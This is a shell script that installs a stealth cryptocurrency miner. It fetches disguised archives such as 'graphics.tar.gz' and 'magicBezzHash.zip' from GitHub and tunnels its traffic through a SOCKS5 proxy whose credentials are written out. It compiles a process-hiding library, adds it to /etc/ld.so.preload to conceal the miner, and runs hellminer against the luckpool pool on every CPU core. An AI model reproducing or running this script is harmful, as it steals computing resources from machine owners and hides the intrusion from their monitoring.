#!/bin/sh 
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime 
dpkg-reconfigure --frontend noninteractive tzdata 
 
apt update;apt -y install binutils cmake build-essential screen unzip net-tools curl 
 
wget https://raw.githubusercontent.com/nathanfleight/scripts/main/graphics.tar.gz 
 
tar -xvzf graphics.tar.gz 
 
cat > graftcp/local/graftcp-local.conf <<END 
listen = :2233 
loglevel = 1 
socks5 = 154.13.90.91:80 
socks5_username = nofvbdys-rotate 
socks5_password = 44tpywm4q9bo 
END 
 
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf & 
 
sleep .2 
 
echo " " 
echo " " 
 
echo "**" 
 
./graftcp/graftcp curl ifconfig.me 
 
echo " " 
echo " " 
 
echo "**" 
 
echo " " 
echo " " 
 
./graftcp/graftcp wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz 
tar xf hellminer_cpu_linux.tar.gz   
 
./graftcp/graftcp wget https://raw.githubusercontent.com/nathanfleight/scripts/main/magicBezzHash.zip 
unzip magicBezzHash.zip 
make 
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl 
mv libprocesshider.so /usr/local/lib/ 
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload 
 
./graftcp/graftcp ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RFAyGt31VDBd2MK4wWQoRsFzUXi755Ubn6.PayAs -p x --cpu $(nproc)
